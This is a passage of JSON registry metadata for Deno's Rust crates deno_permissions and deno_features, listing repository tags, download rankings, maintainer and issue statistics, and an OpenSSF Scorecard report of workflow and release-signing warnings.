2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T03:52:14.023Z","dependent_packages_count":2,"downloads":724421,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":96.55316598603426,"dependent_repos_count":28.723352358651645,"dependent_packages_count":33.8204651097963,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":53.03232781816073},"purl":"pkg:cargo/deno_permissions","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_permissions","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_permissions","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_permissions/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_permissions/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_permissions/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_permissions/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_permissions/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_permissions/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_permissions/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2024-03-13T16:47:37.895Z","updated_at":"2024-03-13T16:47:37.895Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2024-03-13T16:47:37.931Z","updated_at":"2024-03-13T16:47:37.931Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":11576716,"name":"deno_features","ecosystem":"cargo","description":"Provides definitions of Deno unstable features.","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":56,"first_release_published_at":"2025-04-23T08:26:12.865Z","latest_release_published_at":"2026-08-27T15:19:59.146Z","latest_release_number":"0.55.0","last_synced_at":"2026-09-07T22:55:14.407Z","created_at":"2025-04-23T08:31:44.935Z","updated_at":"2026-09-07T22:55:14.407Z","registry_url":"https://crates.io/crates/deno_features/","install_command":"cargo install deno_features","documentation_url":"https://docs.rs/deno_features/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction 